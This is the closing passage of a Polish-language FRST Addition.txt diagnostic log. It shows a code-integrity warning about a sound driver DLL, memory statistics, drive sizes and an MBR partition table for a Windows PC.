is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Sound+\SoundP.dll because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Pentium(R) CPU P6000 @ 1.87GHz Procent pamięci w użyciu: 72% Całkowita pamięć fizyczna: 2986.13 MB Dostępna pamięć fizyczna: 835.34 MB Całkowita pamięć wirtualna: 5970.43 MB Dostępna pamięć wirtualna: 2738.6 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:112 GB) (Free:46.24 GB) NTFS Drive d: () (Fixed) (Total:165.99 GB) (Free:69.94 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (Size: 298.1 GB) (Disk ID: 23F3696A) Partition 1: (Not Active) - (Size=20 GB) - (Type=27) Partition 2: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=112 GB) - (Type=07 NTFS) Partition 4: (Not Active) - (Size=166 GB) - (Type=OF Extended) ==================== Koniec Addition.txt ============================